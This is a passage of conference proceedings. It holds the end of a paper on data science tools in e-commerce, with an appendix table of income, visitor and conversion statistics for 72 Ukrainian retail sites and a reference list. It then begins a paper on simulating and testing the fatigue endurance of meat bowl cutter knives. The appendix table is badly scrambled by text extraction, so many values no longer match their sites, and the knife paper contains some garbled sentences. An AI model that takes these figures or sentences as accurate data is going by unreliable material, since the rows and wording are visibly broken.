effectiveness and usefulness of using Data Science tools in e-commerce, as well as demonstrates the importance of evaluating Internet platforms in the formation of marketing strategy and e-commerce. The issue of processing the accumulated data is still relevant and requires diverse research. The possibilities of using data science tools in e-commerce analysis are a key area for attracting customers, expanding business, and increasing revenue.
356
T. Zatonatska et al.
Appendix A
Table A1. Descriptive statistics of the studied data set. Source: own evaluation №
Name of site
Income (X1)
Income per
Marginality (X3)
Visitors (X4)
month (X2)
Av. Price
Conversion (X6)
Complexity (X7)
Units (X8)
Transactions (X9)
per unit (X5)
1
allo.ua
223,770
31,967
84
11,152,580
25.85
15
1.7985
8,658
4,814
2
aquamarket.com
361,151
51,593
85
844,240
24.3
16
2.2535
14,862
6,595
3
atbmarket.ua
1,096,617
156,660
85
661,860
39.94
9
1.54
27,456
17,829
4
auchan.ua
494,238
70,605
84
1,889,040
26.16
11
1.7747
18,895
10,647
5
avrora.ua
457,750
65,393
82
2,359,240
25.9
8
1.7785
17,677
9,939
6
bdzilka.com
1,217,189
173,884
89
7,964,460
48.55
5
1.282
25,071
19,556
7
bigsale.com
391,644
55,949
85
2,077,240
33.53
8
1.4424
11,679
8,097
8
brain.com
226,804
32,401
84
729,280
25.2
13
1.8641
9,000
4,828
9
chems.com
374,277
53,468
87
1,025,660
33.05
13
1.7286
11,326
6,552
10
decapusta.com
405,015
57,859
85
2,432,640
33.83
7
1.3375
11,971
8,950
11
dom.ua
381,933
54,562
86
1,281,360
35.32
11
1.484
10,814
7,287
12
ecomarket.ua
295,000
42,143
84
1,247,460
25.48
10
1.8157
11,577
6,376
13
emir.ua
363,746
14
epicentr.ua
2,423,111
15
euro-opt.shop
16
eva.ua
17 18
51,964
84
1,356,840
25.57
11
1.8249
14,227
7,796
346,159
86
3,970,840
38.47
7
1.5197
62,982
41,443
274,659
39,237
74
1,559,660
46.9
6
1.2893
5,856
4,542
582,580
83,226
87
3,307,160
44.56
7
1.2024
13,074
10,873
flagma.ua
286,903
40,986
86
2,932,740
37.7
4
1.3044
7,610
5,834
fora.ua
215,001
30,714
85
1,796,940
29.7
6
1.3142
7,240
5,509
19
foxtrot.com
1,648,388
235,484
87
8,417,200
35.67
8
1.4228
46,215
32,481
20
fozzy.com
1,053,715
150,531
84
4,110,020
37.58
9
1.5407
28,041
18,200
21
glass.ua
402,916
57,559
85
1,943,420
32.12
10
1.3163
12,544
9,530
22
gotoshop.ua
479,030
68,433
86
3,541,500
38.66
5
1.3178
12,391
9,403
23
grass.su
224,012
32,002
83
505,600
24.9
18
1.9476
8,998
4,620
24
hotline.ua
283,393
40,485
83
858,780
26.59
14
1.8101
10,658
5,888
25
hozsklad.ua
489,983
69,998
86
2,846,640
37.06
7
1.32
13,221
10,016
26
ibud.ua
205,757
29,394
83
834,860
24.39
12
1.7551
8,437
4,807
27
ikea.com
863,950
123,421
87
5,046,780
45.28
6
1.2872
19,081
14,824
28
infomisto.com
1,079,309
154,187
84
4,072,380
35.99
9
1.639
29,989
18,297
29
jooble.org
191,271
27,324
86
1,938,440
35.22
4
1.2532
5,430
4,333
30
kalambus.com
396,713
56,673
84
2,286,380
39.7
6
1.3485
9,994
7,411
31
kamerton.com
1,123,570
160,510
84
5,291,300
35.32
9
1.4044
31,807
22,648
(continued)
Using Data Science Tools in E-Commerce
357
Table A1. (continued) №
Name of site
Income
Income
Marginality
Visitors
Av.
Conversion
Complexity
Units
Transactions
(X1)
per month (X2)
(X3)
(X4)
Price per unit (X5)
(X6)
(X7)
(X8)
(X9)
32
kishenya.ua
118,862
29,716
83
499,860
25.17
10
1.8335
4,723
33
kolos.ua
432,823
61,832
87
3,005,820
33.99
6
1.3328
12,732
2,576 9,553
34
kopiechka.ua
1,114,030
159,147
87
7,672,460
42.95
5
1.3772
25,939
18,835
35
kran.com
760,743
108,678
86
2,112,300
36.94
11
1.7537
20,594
11,743
36
lotok.ua
260,064
37,152
86
1,515,760
30.41
9
1.2722
8,552
6,722
37
magnit.ua
177,451
25,350
83
858,240
24.09
10
1.7801
7,366
4,138
38
marker.net
405,065
39
mavenclean.com
1,480,882
40
mayevskiy.com
443,801
41
metro.ua
2,654,074
42
milanshop.com
794,700
43
nikol.ua
1,096,618
44
novus.ua
1,403,391
45
octava-market.com
46
office-mix.com
47
opter.com
544,486
77,784
48
pampik.com
182,987
26,141
49
panama.ua
388,856
55,551
50
papiorus.ua
472,078
67,440
51
pobut.com
204,600
29,229
82
673,240
24.6
14
1.8066
8,316
4,603
52
podushka.com
871,532
124,505
89
1,729,600
66.29
11
1.4326
13,147
9,177
53
portal.com
172,357
24,622
86
8,717,240
31.98
1
1.3564
5,389
3,973
54
prom.ua
559,496
79,928
86
2,732,660
33.99
8
1.4332
16,459
11,484
55
miele.ua
1,763,621
251,946
84
6,019,840
35.94
10
1.6579
49,066
29,595
56
prostor.ua
1,413,256
201,894
87
5,296,920
40.08
10
1.3884
35,258
25,394
57
royal.com
232,725
33,246
81
913,380
33.95
10
1.5541
6,855
4,411
58
rozetka.ua
495,505
70,786
86
1,373,300
35.13
14
1.484
14,104
9,504
59
sangig.com
228,570
60
sawash. Com
1,360,941
61
sfera.ua
62
shafa.ua
57,866
86
2,840,040
31.13
7
1.3197
13,014
9,861
211,555
87
9,547,520
37.45
6
1.4407
39,543
27,448
63,400
86
3,178,740
31.2
6
1.4353
14,224
9,910
379,153
85
2,147,780
34.74
36
1.9698
76,398
38,785
113,529
87
4,253,280
44.56
7
1.2547
17,834
14,214
156,660
88
8,835,300
45.04
5
1.216
24,349
20,024
200,484
85
5,331,920
35.56
10
1.499
39,466
26,329
439,232
62,747
86
2,543,360
34.73
8
1.3032
12,646
9,704
975,483
139,355
88
3,561,780
39.16
9
1.5676
24,909
15,890
85
2,804,900
35.95
8
1.3325
15,144
11,365
84
720,440
27.76
10
1.7886
6,591
3,685
85
2,609,680
34.44
7
1.2756
11,290
8,851
85
1,357,980
34.06
13
1.5732
13,860
8,810
32,653
84
1,394,660
30.73
8
1.3606
7,437
5,466
194,420
86
5,532,200
39.2
8
1.5225
34,717
22,802
352,976
50,425
86
2,038,460
31.62
8
1.2916
11,162
8,642
526,262
75,180
86
2,006,780
35.65
10
1.5226
14,763
9,696
(continued)
358
T. Zatonatska et al. Table A1. (continued)
№
Name of site
Income
Income
Marginality
Visitors
Av.
Conversion
Complexity
Units
Transactions
(X1)
per month (X2)
(X3)
(X4)
Price per unit (X5)
(X6)
(X7)
(X8)
(X9)
63
silpo.com
160,178
22,883
82
713,760
24.25
10
1.8567
6,606
64
simi.ua
237,355
33,908
78
357,660
31.87
25
1.6897
7,448
3,558 4,408
65
skladchistoti.ua
434,045
62,006
84
1,868,240
33.25
10
1.3827
13,054
9,441
66
stera.ua
656,673
93,810
86
2,708,720
31.86
11
1.386
20,608
14,869
67
topolyok.ua
664,340
94,906
86
714,160
34.32
30
1.8066
19,359
10,716
68
toscana.ua
171,785
24,541
82
903,960
25.98
8
1.9447
6,612
3,400
69
vroda.ua
302,628
43,233
86
2,144,880
31.52
7
1.3089
9,601
7,335
70
watsons.ua
359,618
51,374
85
1,758,300
34.65
9
1.3025
10,380
7,969
71
zacupca.com
633,359
90,480
86
3,802,980
43.45
6
1.3587
14,578
10,729
72
zapmeta.ua
801,687
114,527
84
3,382,500
37.27
9
1.4058
21,512
15,302
References Akter, S., Wamba, S.F.: Big data analytics in E-commerce: a systematic review and agenda for future research. Electron. Mark. 26(2), 173–194 (2016). https://doi.org/10.1007/s12525-0160219-0 Alrumiah, S.S., Hadwan, M.: Implementing big data analytics in e-commerce: vendor and customer view. IEEE Access. 9, 37281–37286 (2021). https://doi.org/10.1109/ACCESS.2021.306 3615 Amazon. First Quarter Results (2020). https://press.aboutamazon.com/news-releases/news-rel ease-details/amazoncom-announces-first-quarter-results Cheng, Y., Yang, Y., Jiang, J., Xu, G.C.: Cluster analysis of e-commerce sites with data mining approach. Int. J. Database Theory Appl. 8(3), 343–354 (2015). http://dx.doi.org/10.14257/ ijdta.2015.8.3.30 Deloitte. COVID-19 Will Permanently Change E-Commerce (2020). https://www2.deloitte.com/ content/dam/Deloitte/dk/Documents/strategy/e-commerce-covid-19-onepage.pdf Dluhopolskyi, O., Simakhova, A., Zatonatska, T., Oleksiv, I., Kozlovskyi, S.: Potential of virtual reality in the current digital society: economic perspectives. In: 11th International Conference on Advanced Computer Information Technologies, Deggendorf, Germany, pp. 360–363 (2021) E-commerce. EVO (2021). https://evo.business Fedirko, O., Zatonatska, T., Dluhopolskyi, O., Londar, S.: The impact of e-commerce on the sustainable development: case of Ukraine, Poland, and Austria. In: IOP Conference Series: Earth and Environmental Science, vol. 915. International Conference on Environmental Sustainability in Natural Resources Management. Odesa, Ukraine (2021). https://iopscience.iop.org/art icle/10.1088/1755-1315/915/1/012023 Forbes. How COVID-19 Is Transforming E-Commerce (2020). https://www.forbes.com/sites/lou iscolumbus/2020/04/28/how-covid-19-is-transforming-e-commerce/?sh=56742aba3544 Kovtoniuk, K., Molchanova, E., Dluhopolskyi, O., Weigang, G., Piankova, O.: The factors’ analysis of influencing the development of digital trade in the leading countries. In: 11th International Conference on Advanced Computer Information Technologies, Deggendorf, Germany, pp. 290–293 (2021)
Using Data Science Tools in E-Commerce
359
Malhotra, D., Rishi, O.: An intelligent approach to design of e-commerce metasearch and ranking system using next-generation big data analytics. J. King Saud Univ. – Comput. Inf. Sci. 33(2), 183–194 (2021). https://doi.org/10.1016/j.jksuci.2018.02.015 Mykhalchuk, T., Zatonatska, T., Dluhopolskyi, O., Zhukovska, A., Dluhopolska, T., Liakhovych, L.: Development of recommendation system in e-commerce using emotional analysis and machine learning methods. In: The 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), Cracow, Poland, vol. 1, pp. 527–535 (2021) Naur, P.: Concise Survey of Computer Methods. Studentlitteratur, Lund (1975) Panchenko, O., Klochko, A., Dluhopolskyi, O., Klochko, O., Shchurova, V., Peker, A.: Impact of the COVID-19 pandemic on the development of artificial intelligence: challenges for the human rights. In: 11th International Conference on Advanced Computer Information Technologies, pp. 744–747. Deggendorf, Germany (2021) Rymarczyk, T., et al.: Comparison of machine learning methods in electrical tomography for detecting moisture in building walls. Energies 14(2777), 1–22 (2021). https://doi.org/10.3390/ en14102777 Statista. Retail E-Commerce Sales Worldwide from 2014 to 2024 (2021). https://www.statista. com/statistics/379046/worldwide-retail-e-commerce-sales Wang, Q., Cai, R., Zhao, M.: E-commerce brand marketing based on FPGA and machine learning. Microprocess. Microsyst. 103446 (2020). https://doi.org/10.1016/j.micpro.2020.103446 Yue, Y.S., Li, B.: E-commerce platform and exports performance of Chinese manufacturing enterprises – empirical evidence based on big data from Alibaba. China Industr. Econ. 8, 97–115 (2018) Zatonatska, T., Dluhopolskyi, O.: Modelling the efficiency of the cloud computing implementation at enterprises. Mark. Manage. Innov. 3, 45–59 (2019) Zatonatska, T., Dluhopolskyi, O., Bobro, O.: Development of electronic payment systems in the structure of e-commerce in the Visegrad Group and Ukraine. In: Krysovatyy, A., Shengelia, T. (eds.) Visegrad Group: A Form of Establishment and Development of European Integration: Coll. Monograph, pp. 96–112. TSU, Tbilisi (2021) Zatonatska, T., Dluhopolskyi, O., Chyrak, I., Kotys, N.: The internet and e-commerce diffusion in European countries (modeling at the example of Austria, Poland, and Ukraine). Innov. Mark. 15(1), 66–75 (2019) Zatonatska, T., Suslenko, V., Dluhopolskyi, O., Brych, V., Dluhopolska, T.: Investment models on centralized and decentralized cryptocurrency markets. Naukovyi Visnyk Natsionalnoho Hirnychoho Universytetu. 1, 177–182 (2022). https://doi.org/10.33271/nvngu/2022-1/177 Zhuravka, F., Filatova, H., Šuleˇr, P., Wołowiec, T.: State debt assessment and forecasting: time series analysis. Invest. Manage. Financ. Innov. 18(1), 65–75 (2021). https://doi.org/10.21511/ imfi.18(1).2021.06
Computer Modeling in Physical and Chemical Processes
Simulation of Influence of Constructive Parameters of Meat Bowl Cutterknives on Their Endurance at Alternative Oscillations Olexandr Batrachenko(B) Cherkasy State Technological University, Cherkasy, Ukraine [email protected]
Abstract. The aim of the work is to study by numerical methods the dependence of the endurance limit of bowl cutter knives on their design parameters. SolidWorks software, Simulation module, has been used to determine the endurance limit of bowl cutter blades. 6 types of knife designs that are most often used in modern models of bowl cutters are studied. To ensure a high endurance limit of bowl cutter knives, it is very important to use rounding or chamfers on their back face. Rounding in the form of a vertical ellipse (+17% endurance) has the highest efficiency, however such geometry will cause deterioration of manufacturability of production of a knife, and consequently, its rise in price. The use of a chamfer of C = 2 mm increases the endurance by 16%. The use of rounding with a radius of R = 2.5 mm increases endurance by 15%. Keywords: Bowl cutter · knives · durability · fatique strength
1 Introduction Increasing the efficiency of cutter knives has been the central task of many scientific works. At the same time, the main attention of scientists is attracted by the issue of increasing the wear resistance of knives. The practice of meat processing indicates the need for researchers to focus on other aspects of the performance of these parts – on static strength, tiring endurance, impact strength. An analysis of the proof of cutters operation points to the acute problem of the safety of the dependability of the main working organs – knives. Insufficient quality of knives can lead to partial failures of their failure under an hour of cutter’s work. At the same time, knives fail (the cost of one knife of European manufacturers reaches 120–350 euros), raw meat in the cutter bowl (120–750 l) becomes unsuitable for further use, the bowl and cover of the cutter head are damaged, and there is a risk of failure of the cutter shaft bearing and the shaft itself due to a significant increase in the unbalance of the cutter head. As a result, the cutter breaks down for a long time and requires a significant amount of repair work, which ultimately leads to significant material losses for the meat processing plant. Previous studies of the author of the article and other researchers indicate the fatiguing character of the destruction of the overwhelming majority of knives broken during © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 363–385, 2023. https://doi.org/10.1007/978-3-031-35467-0_23
364
O. Batrachenko
cutting. Actual are priming effective ways to promote the automatic vibrancy of cutter’s knives. The static quality of cutter knives has been studied in many scientific works, for example, in [1]. However, the presented results do not allow us to identify all the main factors that lead to the destruction of knives and do not outline effective ways to increase their strength and reliability, since the influence of alternating loads on the durability of knives was not taken into account in these works. However, the presented results do not allow us to identify all the main factors that lead to the destruction of knives and do not establish effective ways of propagating their morality and superiority, fragments in these works are not immune to the influx of familiar trends in the durability of knives. According to the studies presented in [2–4], the nature of the fracture of knives indicates fatigue nature of their destruction. At the same time, thorough fatigue endurance of cutter knives has not been studied in known works. There are also no works in which highly effective ways to increase fatigue endurance of knives would be proposed and substantiated. The problem of fatigue fracture of metals is quite fully described in [5]. The authors of [6] note an extremely important role in choosing the grade of material, the type and modes of its heat treatment, the quality of the metal surface to ensure its high fatigue strength. The paper presents a fundamental study of the features of corrosion-fatigue destruction of machine parts. It is noted in [7] that a corrosive medium significantly (up to several times) reduces fatigue strength of metals. The preliminary corrosive effect of the medium, for example, during storage of parts, also has a significant effect on the decrease in strength. In [8], fatigue properties of an aluminum silicon-magnesium alloy AlSi10Mg obtained by additive manufacturing are studied, the high-cycle fatigue resistance (HCF) is simulated in the presence of defects, and fatigue limit of the material is predicted. Three batches of samples are studied using X-ray microcomputed tomography and tested under fatigue conditions. A resistance curve of the lower boundary is obtained, which takes into account artificial defects of such a size that corresponds to the size of the largest defects that occur in practice. It is concluded that fracture mechanics modelling is clearly the tool needed to support the application of additive manufacturing to safety critical components. The authors of [9] have studied the effect of average stress on fatigue life and fatigue limit for 316 stainless steel. The results for prestressed samples show that fatigue life is almost the same in the same strain range, regardless of stress amplitude, maximum peak stress and medium strain. The decrease in fatigue life is caused by a change in the effective strain range, which has been caused by an increase in the minimum peak stress and strain of the mechanism. The article [10] provides a review and systematization of studies on the threshold of propagation of a fatigue crack in metals as design criteria. The article discusses the issues of its experimental definition, as well as its application to components. In both of these areas, new questions have been raised that may challenge or change previously known data.
Simulation of Influence of Constructive Parameters
365
The authors of [11] describe the use of data analysis tools to predict fatigue strength of steels. Several approaches have been used to establish correlations between various alloy properties, their composition, and manufacturing process parameters. Data-driven approaches are of considerable interest to materials engineers, especially when achieving extreme properties, such as cyclic fatigue, where current models based on modern physics have serious limitations. The results have shown that several advanced data analysis techniques, such as neural networks, decision trees, and multivariate polynomial regression, can significantly improve prediction accuracy compared to previously known studies. The results of the research confirm the usefulness of such data mining tools for predicting fatigue strength of steels and for actually creating predictive models for them. In the article [12], the authors propose a model for fracture mechanics based on predicting the S-N characteristics of metal components with large microstructural defects for plates made of aluminum alloys Al 2024-T3 and Al 7075-T6, as well as ductile iron EN-GJS-400-18-LT. The authors identify high levels of applied stresses, coupled with the potential for multiple cracks, as the likely root of the problem, and propose a scheme to extend the model to account for crack initiation. The work [13] is devoted to predicting fatigue limit of notched specimens. The endurance limit of specimens with a notch is determined by the condition of nonpropagation of mechanically small surface cracks, as well as by the applied nominal stress, for which the condition of contact between the crack movement and the resistance force is satisfied. The approach has been modified to include ductility effects in the mechanically short crack mode, and it has been applied to normal and high strength steel in the case of an endless round hole plate with tensile stress removed. The high efficiency of using this method has been confirmed. The article [14] provides a review of the literature on fatigue strength of parts that are made of AlSi10Mg and Ti6Al4V alloys using additive technologies. In this case, their sensitivity to defects and inhomogeneities is taken into account. The results have shown that fatigue properties and key factors (heat treatment effect, defect size) are very similar to the performance of parts obtained using traditional manufacturing processes. These results confirm that fault-tolerant design concepts can also be adopted for AM components. In [15], it is shown that an effective way to increase fatigue strength of parts is their strengthening surface treatment. The use of chemical-thermal treatment [16], surface plastic deformation, treatment with concentrated energy sources makes it possible to increase fatigue endurance of parts by more than 3 times. Based on the analysis of well-known publications, the author of this article has concluded that it is relevant to study the effectiveness of using high-frequency mechanical forging [17] and pulse-plasma strengthening [18] to increase fatigue endurance of cutter knives. It is also relevant to study the influence of such design parameters of cutter knives as blade geometry, knife width, back face geometry, at the limit of their endurance.
366
O. Batrachenko
The solution of the above problematic tasks will significantly increase the durability of cutters, and hence increase the profitability of their use in meat processing industries. Objective. The aim of the work is to substantiate, using numerical methods and active experiment, new ways to increase the endurance limit of cutter knives by modifying their design and using a reinforcing surface. Object of study: endurance limit of cutter knives. Subject of study: regularities of the influence of the design parameters of cutter knives and technologies of their surface strengthening on their endurance limit. To achieve this goal, the following tasks are set: • to analyze well-known studies of the endurance limit of cutter knives and ways to increase it; • to develop methods for studying the endurance limit of cutter knives by numerical methods and by conducting an active experiment; • to reveal the patterns of influence of the design parameters of cutter knives and technologies of their surface strengthening on their endurance limit; • to suggest ways to increase the endurance limit of cutter knives. Research methodology. Since, according to certain research tasks, it is necessary to carry out both numerical modelling and experimental studies, the research methods are divided into two groups.
2 Materials and Methods To simulate the operation of knives under conditions of alternating loads and determine the endurance limit of cutter knives, the SolidWorks software package, in particular its Simulation module, is used. SolidWork Simulation is a finite element analysis environment integrated with SolidWorks CAD. SolidWorks Simulation is designed for mathematical modelling of common types of physical phenomena. The module allows you to calculate the stress-strain state of substructures, the action of forces applied to the system constant in time, under impact load, conduct frequency analysis, endurance analysis, etc. Modelling of the operation of cutter knives under conditions of alternating loads has been carried out according to the following stages (Fig. 1): 1) construction of three-dimensional models of the objects under study (construction in SolidWorks of 3D models of the most commonly used knives in practice); 2) determination of the grade of the material of the model (alloyed steel, yield strength – 620 MPa; the value of the yield strength corresponds to the grade of steel N680, widely used by manufacturers for the manufacture of cutter knives); 3) generation of the computational grid (tetrahedra are used as grid elements; grid size is relative, 0.05; grid improvement radius is 5; surface grid smoothing level is 3); 4) indication of model fixing; 5) indication of the type of loads (cutting forces, pressure forces of raw materials on the side surface of the knife due to the supply of raw materials by the cutter bowl, centrifugal forces) and their significance;
Simulation of Influence of Constructive Parameters
367
6) execution of the calculation in automatic mode; 7) saving the results of the calculation by means of a report and their analysis.
Fig. 1. Statement of the problem in the study of the endurance of cutter knives
We have studied 6 types of knife designs (Fig. 2), most commonly used in modern models of cutters (maximum radius is 300 mm and thickness h = 5 mm). The knives of the presented types refer to cutters of the following brands: type I – Seydelmann; types II and III – Laska; type IV – Kilia; type V – Alpina; type VI –L5-FKB. The factors that vary are bowles (Fig. 3): the geometric shape of the blade and the back edge of the knife, the radius of the rounded back edge of the knife (R = 0.5; 1.0; 1.5; 2.0; 2.5 mm), the value of the chamfer on the back face of the knife (C = 0.5; 1.0; 1.5; 2.0; 2.5 mm); horizontal ellipse 6.25 × 2.5 and 4.00 × 2.5 mm; vertical ellipse 2.5 × 1.5 mm).
3 Experiments The study of the endurance limit of cutter knives is carried out in accordance with the Ukrainian standard DSTU 2546-94 “Calculation and testing for strength. Methods for testing metal materials fatigue under high-cycle load conditions”. Samples are being tested continuously until a crack of a given size is formed, completely destroyed, or until the base number of cycles is reached. In the process of testing the samples, the stability of setting loads (deformations) is being controlled. To plot the durability distribution curve and estimate the average value and standard deviation of the logarithm of durability at a given stress level, a series of at least 10 identical samples is tested until complete destruction or the formation of macrocracks. The test base for determining the endurance limit is taken as 107 cycles. We have used cantilever fixation of the samples which are made in the form of plates and a symmetrical cycle of their deformation. For this purpose, we have used a vibrating electrodynamic unit VEDS-200A (Fig. 4). It is intended for testing products
368
O. Batrachenko
Fig. 2. Knife design schemes, which are most often used in practice: (a) type I; (b) type II; (c) type III; (d) type IV; (e) type V; (f) type VI; R is the largest radius of the wrapping point of the knife; ω is straight knife wrap with trimmed raw material; 1, 2 are zones of the highest stresses in the body of the knife and internal cracks in the new one
for vibration strength and vibration resistance in laboratory and production conditions. The technical characteristics are as follows: pushing force – 2,000 N, frequency range – 5–5,000 Hz, vibration acceleration without load – 392 m/s2 , vibration acceleration with maximum load – 39 m/s2 , maximum mass of the tested products – 45 kg, maximum power consumption – 5 kW, cooling – air. The prototypes are made in the form of 5 mm thick plates (Fig. 5) from N680 steel, which is most often used in the manufacture of cutter knives. The samples have the appropriate heat treatment and surface quality. Based on the results obtained, a fatigue curve (Weller curve) is constructed. Approximation by the least squares method is used. The influence of such methods of surface strengthening as pulse-plasma treatment and high-frequency mechanical forging is studied. Pulse-plasma hardening has been carried out on the “IMPULS” installation of the laboratory of the E.O. Paton Electric Welding Institute of the National Academy of Sciences of Ukraine. The installation operation scheme is shown in Fig. 6. The detonation plasma generator consists of a detonation chamber 1, where a combustible gas mixture is formed and its combustion is initiated in the detonation mode; coaxial electrodes 2 and 3 and power supplies.
Simulation of Influence of Constructive Parameters
369
Fig. 3. Geometric parameters of cutter knife and the zone of the highest stress concentration: 1) side view of the knife; 2) section of the knife; 3) rounding of the back edge of the knife with a radius R; 4) chamfers on the back face; 5) rounding of the back edge of the knife with a horizontal ellipse; 6) rounding of the back edge of the knife with a vertical ellipse; 1, 2 are zones of the highest stress concentration
Fig. 4. Vibrating electrodynamic unit VEDS-200A: (a) general view of the installation; (b) general view of the sample fixed in the grips of the installation
Gas-dynamic and electromagnetic forces are involved in the process of plasma formation acceleration. As a result of detonation, partially ionized combustion products enter the interelectrode gap 5 from the detonation chamber and close the R–L–C circuit of the power source. As a result, the capacitor bank is discharged.
370
O. Batrachenko
Fig. 5. Fatigue testing of the sample on the vibration stand VEDS-200A: (a) stationary sample; (b) deformation of the sample during vibrations; (c) fatigue cracks
Fig. 6. Scheme of the detonation generator: 1 – detonation chamber; 2, 3 – coaxial electrodes; 4 – consumable electrode; 5 – interelectrode gap; 6 – processing surface
A certain electrically conductive volume of gas 5, the degree of ionization of which increases, flows through between coaxial electrodes 2 and current 3. When a current
Simulation of Influence of Constructive Parameters
371
flows through the plasma, Joule heat is released, a certain fraction of which is involved in the acceleration process during the expansion of the heated volume of ionized gas. This further enhances the gas-dynamic component of the force. During the flow in the interelectrode gap 5, the plasma causes erosion of the electrode 4, resulting in saturation of the plasma with alloying elements (W, Mo). The resulting plasma jet acts on the treated surface 6. When the plasma pulse interacts with the surface of the product, electrical circuit between the central electrode and the surface of the product 6 closes. And in the contact zone, an area of a shock-compressed plasma layer appears. In this case, knives are strengthened using the following processing modes: the capacity of the capacitor bank of the discharge circuit is C = 800 μF; voltage on the covers of the capacitor bank U = 3.2 kV; discharge circuit inductance L = 30 uH; pulse initiation frequency υ = 2.5 Hz; the material of the electrode used is W. Strengthening by high-frequency mechanical forging has been carried out using the IPM (impulse peening machine) installation of the E.O. Paton Electric Welding Institute of the National Academy of Sciences of Ukraine (Fig. 7, a, b, c). The principle of operation of the IPM installation is to provide a high-frequency oscillatory movement to the head with strikers using a piezoceramic transducer. The strikers carry out surface deformation of metal layers (hardening), which leads to an improvement in mechanical properties of the surface layer of the workpiece. The IPM unit has the following technical characteristics: mains voltage 220 V, power consumption 1.0 W, maximum electrical power supplied to the tool 600 W, mechanical resonance frequency 20 ± 0.5 kHz, static tool pressing force 20–50 N, instrument cooling type – air, ultrasonic generator weight 5.0 kg, percussion instrument weight 3.0 kg.
Fig. 7. Installation for surface strengthening by high-frequency mechanical forging: a) general view of the installation; b) reinforcement of fatigue test prototype; c) strengthening of the test specimen for impact testing
Figure 8 shows the appearance of a conventional sample and samples that are surfacehardened by the above technological methods. TIME 3221 profilometer has been used to control the effect of reinforcing samples on the surface roughness. Its principle of operation is based on the movement of the induction contact sensor along the surface whose parameters are measured. The device measures 40 profile parameters, including Ra, Rt, Rp, Rv, Rz, Rc, Rq, Rsk, Rku, RPc
372
O. Batrachenko
Fig. 8. Appearance of prototypes for fatigue testing: (a) a standard sample; (b) superficially reinforced with vibro-hardening; (c) surface hardened by pulsed plasma treatment
and the like. The measurement range of the sensor needle is 400 μm. The radius of the measuring pen is 5 μm. The material of the measuring pen of the device is a diamond needle, the measuring force is 4 mN. The maximum passage length is 19 mm. The evaluation length is 0.08 mm, 0.25 mm, 0.8 mm, 2.5 mm. Measurement accuracy is ±10%. The measurement results are stored in the device memory and can also be transferred to a personal computer using a USB connection. The hardness of the prototypes has been measured using a TK-2M hardness tester (on the Rockwell scale) and a TSh-2 hardness tester (on the Brinell scale). Considering the high rotational speeds of knives in modern models of cutters (up to 100 s−1 ) and the periodic (impact) nature of the contact of knives with raw materials, it is relevant to study the effect of surface hardening treatment on the impact strength of knives. The impact strength of the prototypes has been measured using a MK-30A pendulum impact tester. The methodology for measuring impact strength complies with the Ukrainian standard DSTU ISO 9016:2008 “Destructive testing of welded joints, metallic materials. Impact bending tests. Location of the test specimen, notch on the specimens, test report”. Type V specimens have been made (Fig. 9). The repeatability is 5 samples of the same type. The value of the energy of the pendulum in the initial h0 and in the final h1 positions is noted. After that, the energy difference is determined: W = Q(h1 − h0 ),
(1)
where Q is the weight of the pendulum. The value of toughness is calculated as follows: a=
W , A
where A is the area of the weakened cross section of the test sample.
(2)
Simulation of Influence of Constructive Parameters
373
Fig. 9. Appearance of test specimens for impact test: (a) ordinary specimen; (b) surface reinforced with high-frequency mechanical forging; (c) surface reinforced by pulse-plasma treatment
4 Results 4.1 Investigation of the Endurance Limit of Cutter Knives Under Alternating Loads by Simulation In order to study the influence of geometric shape of the cutter knife on its resistance to fatigue failure and to develop recommendations for rational design of knives, simulation of their endurance under alternating loads has been performed. The results are presented in Fig. 10, 11 and 12. The results obtained during the simulation show the following. The lowest values of endurance limit are shown by knives of the following brands: “Laska universal” – 2.2·104 cycles; “Laska for smoked sausages” – 2.2·104 cycles; Seydelmann – 2.4·104 cycles. Knives of other brands have much higher endurance: Alpina – 4.2·105 cycles; Kilia – 1·106 cycles and above; L5FKB – 1·106 cycles and above. At the same time on average knives of modern cutters for utilization can earn up to 2.3·106 cycles. As follows from the results, the geometric shape significantly affects the durability of cutter blades under alternating loads. Seydelmann knife (2.49·103 deformation cycles, Fig. 10, (a)) has the shortest service life. Kilia knife (16.2·103 deformation cycles, Fig. 10, (b)) has slightly longer service life. Knives follow in ascending order: “Laska Universal” knives (21.7·103 deformation cycles, Fig. 11, (a)), “Laska for smoked sausages” (24.2·103 deformation cycles, Fig. 11, (b)), Alpina (545.2·103 deformation cycles, Fig. 12, (a)) and L5-FKB (663.2·103 deformation cycles, Fig. 12, (b)). Kilia, “Laska Universal” and “Laska for Smoked Sausages” knives have an order of magnitude longer service life than Seydelmann knives. And the service life of Alpina and L5-FKB knives is one order of magnitude longer than Kilia, “Laska Universal” and “Laska for smoked sausages”, and two orders of magnitude longer than Seydelmann. The following should be noted here. Some of the presented brands of knives (Seydelmann, “Laska for smoked sausages”) are intended specifically for the production of minced meat for smoked sausages and only for them. This means that, according to the requirements of food technology, such knives rotate about 2 times slower during the main stage of grinding than knives used in the manufacture of cooked sausages or universal knives. Therefore, smoked sausage knives will work about twice as many shifts as cooked sausage knives with the same service life, measured in the number of deformation cycles before tedious destruction. But this really significant difference is
374
O. Batrachenko
Fig. 10. The results of numerical simulation of the service life of cutter knives under alternating loads (number of cycles of deformation to failure): (a) Seydelmann brand knife; (b) Kilia brand knife
Fig. 11. The results of numerical simulation of the service life of cutter knives at alternating loads (number of load cycles): (a) “Laska universal” brand knife; (b) “Laska for smoked sausages” knife
not enough to cover the difference by one or two orders of magnitude in the service life of these knives, which is why the considered designs of knives will be located in the direction of increasing their durability under alternating loads: Seydelmann, Kilia, “Laska universal”, “Laska for smoked sausages”, Alpina, L5-FKB. Also, after adding the geometry of the back edge of the knife to its vibrancy known technical ways have been used to improve fatigue endurance of details – change in the concentration of stress in critical areas, rounding off or chamfers of surface details. In
Simulation of Influence of Constructive Parameters
375
Fig. 12. The results of numerical simulation of the service life of cutter knives under sign loads (number of load cycles): (a) Alpina brand knife; (b) L5-FKB brand knife
this case, the concentration of stress on the edges of the rear face changed like a path towards them: • • • •
rounding with radius R; chamfers of size C; rounding of both edges in the form of a horizontal ellipse 4.00 × 2.50 mm; rounding of both edges in the form of a vertical ellipse measuring 2.50 × 1.50 mm.
